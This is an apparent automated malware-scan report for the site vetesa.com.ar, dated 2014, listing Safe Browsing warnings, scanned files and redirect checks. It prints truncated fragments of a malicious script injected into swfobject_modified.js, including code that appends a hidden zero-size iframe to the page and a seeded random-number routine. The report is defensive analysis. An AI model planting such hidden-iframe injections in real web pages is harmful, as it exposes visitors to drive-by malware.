Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=vetesa.com.ar
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://vetesa.com.ar/ | 200 OK Content-Length: 2372 Content-Type: text/html | clean |
http://vetesa.com.ar/Scripts/swfobject_modified.js | 200 OK Content-Length: 29137 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var swfobject = function() { var UNDEF = "undefined", OBJECT = "object", SHOCKWAVE_FLASH = "Shockwave Flash", SHOCKWAVE_FLASH_AX = "ShockwaveFlash.ShockwaveFlash", FLASH_MIME_TYPE = "application/x-shockwave-flash", EXPRESS_INSTALL_ID = "SWFObjectExprInst", win = window, doc = document, nav = navigator, domLoadFnArr = [], regObjArr = [], timer = null, storedAltContent = null, storedAltContentId if(f)e(s);} Decoded script: j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 j%2 ifrm.style.height = "0px"; ifrm.style.visibility = "hidden"; document.body.appendChild(ifrm); } } catch (e) { } }, 500 */ var hi = this.seed / this.Q; var lo = this.seed % this.Q; var test = this.A * lo - this.R * hi; if(test > 0){ this.seed = test; } else { this.seed = test + this.M; } return (this.see Antivirus reports:
| ||
http://vetesa.com.ar/test404page.js | 404 Not Found Content-Length: 959 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: vetesa.com.ar
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 20:38:28 GMT
Accept-Ranges: bytes
ETag: "16215d0-944-4cfad42367680"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2372
Content-Type: text/html
Last-Modified: Fri, 30 Nov 2012 02:35:54 GMT
X-Powered-By: PleskLin
...2372 bytes of data.
GET / HTTP/1.1
Host: vetesa.com.ar
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 02 Oct 2014 20:38:28 GMT
Accept-Ranges: bytes
ETag: "16215d0-944-4cfad42367680"
Server: Apache
Vary: Accept-Encoding
Content-Length: 2372
Content-Type: text/html
Last-Modified: Fri, 30 Nov 2012 02:35:54 GMT
X-Powered-By: PleskLin
...2372 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: vetesa.com.ar
Referer: http://www.google.com/search?q=vetesa.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: vetesa.com.ar
Referer: http://www.google.com/search?q=vetesa.com.ar
Result:
The result is similar to the first query. There are no suspicious redirects found.